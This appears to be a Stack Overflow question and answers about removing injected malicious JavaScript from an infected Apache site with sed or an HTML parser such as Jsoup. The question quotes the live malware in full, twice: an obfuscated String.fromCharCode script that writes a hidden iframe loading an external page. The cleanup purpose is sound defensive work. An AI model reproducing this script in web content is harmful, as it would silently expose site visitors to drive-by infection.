# sed multiline replace HTML with javascript malicious code

Tags: regex, sed, replace, multiline

I've a apache server that has been infected with pieces of malicious javascript code to infect the computers that visit the web page.
What i'm trying to do is remove these pieces of malicious code using find and sed commands in a Linux server.
I have created a regular expression for sed that match almost everything but the "" end tag. It is in a new line and I can't find the way to match it as well.

The malicious code is:

```
<script>if (i5463 == null) { var i5463 = 1; var vst = String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101); window.status=vst;  document.write(String.fromCharCode(60)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(121)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(83)+String.fromCharCode(80)+String.fromCharCode(76)+String.fromCharCode(65)+String.fromCharCode(89)+String.fromCharCode(58)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(119)+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(121)+String.fromCharCode(122)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(46)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(109)+String.fromCharCode(108)+String.fromCharCode(63)+String.fromCharCode(112)+String.fromCharCode(61)+String.fromCharCode(50)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(55)+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(119)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(61)+String.fromCharCode(34)+screen.width+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(105)+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(61)+String.fromCharCode(34)+screen.height+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(62)); window.status=vst; }
</script>
```

Note of the writer: After creating the question, I can see that the web formatting cuts the previous sample. If you want to see the full sample of malicious javascript code, have a look at the text not bold in the next text and just add at the end of the text a "new line" and a "" html tag.

```
The regular expression that works for all the text but for the last "</script>" is:
**find /root/cambios -type f -exec sed -i 's#**<script>if (i5463 == null) { var i5463 = 1; var vst = String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101); window.status=vst;  document.write(String.fromCharCode(60)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(121)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(83)+String.fromCharCode(80)+String.fromCharCode(76)+String.fromCharCode(65)+String.fromCharCode(89)+String.fromCharCode(58)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(119)+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(121)+String.fromCharCode(122)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(46)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(109)+String.fromCharCode(108)+String.fromCharCode(63)+String.fromCharCode(112)+String.fromCharCode(61)+String.fromCharCode(50)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(55)+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(119)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(61)+String.fromCharCode(34)+screen.width+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(105)+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(61)+String.fromCharCode(34)+screen.height+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(62)); window.status=vst; }**##g' {} \;**
```

So, please, anyone can help to match the new line and the "" text??
Thank you in advance.

Comment: This doesn't seem to be Regex. You have just added the complete string into it. What do you think what a Regex does? And why we use it?

Comment: You could use an xml parser here

Comment: Hi: the idea is delete the malicious javascript code. If I use regular expression, it's possible that sed deletes not malicious useful code for the application. I need to match exactly the malicious code, the new line and the </script> tag. Maybe using another bash utility it would work.
Any ideas? Thanks in advance

Comment: possible duplicate of [Removing Malware using Linux](http://stackoverflow.com/questions/13457589/removing-malware-using-linux)

Answer (score 1):

Indeed you shouldn't use regex for this task. As has been told many times in SO regex are not the proper tool for dealing with HTML manipulations as it is not a regular language. Your best bet is to use an HTML parser. For instance, the following unoptimized (but still simple) code uses Jsoup for achieving your goal:

```
import org.jsoup.Jsoup;
import org.jsoup.nodes.DataNode;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.nodes.Node;
import org.jsoup.select.Elements;

public class RemoveScript {
    public static void main(String args[]){
        String viralContent = "Your viral content";
        String inputText = "<html><head><script>" + viralContent + "</script></head><body></body></html>";

        Document doc = Jsoup.parse(inputText);
        Elements scripts = doc.select("script");
        for(Element element : scripts) {
            for (Node child: element.childNodes()) {
                if (child instanceof DataNode) {
                    String content = ((DataNode) child).getWholeData();
                    if (content.equals(viralContent)) {
                        element.remove();
                    }
                }
            }
        }
        System.out.println(doc.toString());
    }
}
```

I'm sure other parsers can do the same very easily too.